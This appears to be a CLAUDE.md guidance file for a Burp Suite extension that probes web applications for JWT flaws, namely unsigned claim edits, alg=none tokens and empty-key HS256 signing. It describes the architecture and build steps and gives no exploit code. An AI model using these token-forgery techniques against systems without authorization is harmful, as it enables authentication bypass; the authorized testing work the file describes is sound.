Skip to content

CLAUDE.md

Latest commit

 

History

History
98 lines (72 loc) · 3.56 KB

CLAUDE.md

File metadata and controls

98 lines (72 loc) · 3.56 KB

CLAUDE.md

This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.

Project Overview

This is a Burp Suite extension for testing JWT (JSON Web Token) vulnerabilities in web applications. The extension intercepts HTTP requests, extracts JWT tokens from Authorization headers or cookies, modifies claims, and tests various JWT attack vectors to identify security weaknesses.

Build and Development Commands

Build

./gradlew build

Clean Build

./gradlew clean build

Create JAR

./gradlew jar

The JAR will be created at build/libs/burp-jwt-claim-probe-1.0.0.jar

Architecture

Core Components

  1. JwtClaimProbeExtension (src/main/java/jwtprobe/JwtClaimProbeExtension.java)

    • Main extension entry point implementing BurpExtension
    • Initializes settings, UI panel, and proxy handler
    • Registers the extension with Burp Suite

  2. ProxyJwtHandler (src/main/java/jwtprobe/ProxyJwtHandler.java)

    • Implements ProxyRequestHandler to intercept HTTP requests
    • Extracts JWT tokens from Authorization headers or cookies
    • Performs JWT vulnerability testing with various attack vectors
    • Logs findings to /tmp/jwt-claim-probe-issues.log

  3. JwtUtils (src/main/java/jwtprobe/JwtUtils.java)

    • Utility functions for JWT manipulation
    • Token validation, Base64 encoding/decoding
    • JWT modification methods for different attack types:
      • buildTokenKeepSignature() - Modifies payload without re-signing
      • buildTokenAlgNone() - Sets algorithm to 'none' (removes signature)
      • buildTokenHS256EmptyKey() - Signs with empty HMAC key

  4. Settings (src/main/java/jwtprobe/Settings.java)

    • Configuration class with attack options and settings
    • Thread-safe atomic booleans for toggles
    • Configurable claim names, values, and types

  5. SettingsPanel (src/main/java/jwtprobe/SettingsPanel.java)

    • Swing-based UI for extension configuration
    • Allows enabling/disabling attack vectors
    • Configures target claims and expected responses

Attack Vectors

The extension tests three main JWT vulnerability classes:

  1. Modify-Only Attack: Changes claim values without re-signing the token
  2. Algorithm None Attack: Sets alg header to none to bypass signature verification
  3. Empty Key Attack: Signs tokens using HS256 with an empty secret key

Token Extraction

  • Authorization Header: Extracts Bearer tokens from Authorization: Bearer <token>
  • Cookie Extraction: Extracts tokens from configurable cookie names
  • Scope Filtering: Only processes requests within Burp's defined scope
  • Anti-Loop Protection: Uses X-JWT-Claim-Probe header to prevent infinite loops

Configuration

Key settings in the Settings class:

  • claimName and claimValue: The claim to modify and its new value
  • claimType: Data type (STRING, BOOLEAN, NUMBER, NULL)
  • okStatus: Expected HTTP status code for successful exploitation
  • allowedMethods: HTTP methods to process (default: GET, POST)
  • ignoreExt: Regex pattern for file extensions to skip

Dependencies

  • Java 17+
  • Burp Suite Montoya API (2024.11)
  • Gradle build system

Security Testing Purpose

This tool is designed for authorized security testing to identify:

  • JWT implementations that don't properly validate signatures
  • Applications accepting unsigned tokens (alg=none)
  • Weak key management (empty HMAC keys)
  • Insufficient claim validation

Results are logged both to Burp's output and to /tmp/jwt-claim-probe-issues.log in JSON format for further analysis.